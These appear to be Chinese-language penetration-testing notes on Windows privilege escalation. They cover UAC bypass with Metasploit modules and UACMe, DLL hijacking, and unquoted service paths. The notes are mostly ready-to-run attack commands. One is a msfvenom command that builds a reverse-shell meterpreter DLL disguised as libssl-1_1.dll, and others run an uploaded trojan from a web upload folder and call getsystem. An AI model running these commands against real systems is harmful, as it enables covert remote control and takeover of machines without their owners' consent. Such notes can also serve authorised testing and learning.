使用msf模块进行bypassuac
search uac 查找关于uac的模块
use exploit/windows/local/bypassuac
set session 1
run
windwos 10 使用msf提权:
use exploit/windows/local/bypassuac_sluihijack
use exploit/windows/local/bypassuac_silentcleanup
set session 1
UACMe进行bypassuac
上传uacme
常用61,41,23
利用Akagi64.exe 41 C:\phpstudy_pro\WWW\pikachu-master\vul\unsafeupload\uploads\msf.exe
执行木马上线msf
msf再次执行getsystem
dll劫持提权
提权原理:
Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory,CWD
6、在PATH环境变量的目录(先系统后用户)
使用火绒剑分析该进程执行时加载了哪些dll
使用msf生成dll文件
msfvenom -p windows/meterpreter/reverse_tcp lhost= xxxx lport=4444 -f dll >./libssl-1_1.dll
替换相关dll文件
不带引号服务路径配合MSF-MacroExPert
原理:文件在执行的时候加载路径,如果是"c:\program (x86)\1.exe"则被视为完整路径
如果为c:\program (x86)\1.exe 则被视为参数,前提未加引号路径需要带空格。
利用msf生成木马为program.exe的文件放置c盘符根路径,启动程序,msf会话监听可完成提权。
检测服务端不带引号服务路径项目:
GitHub - 411Hall/JAWS: JAWS - Just Another Windows (Enum) Script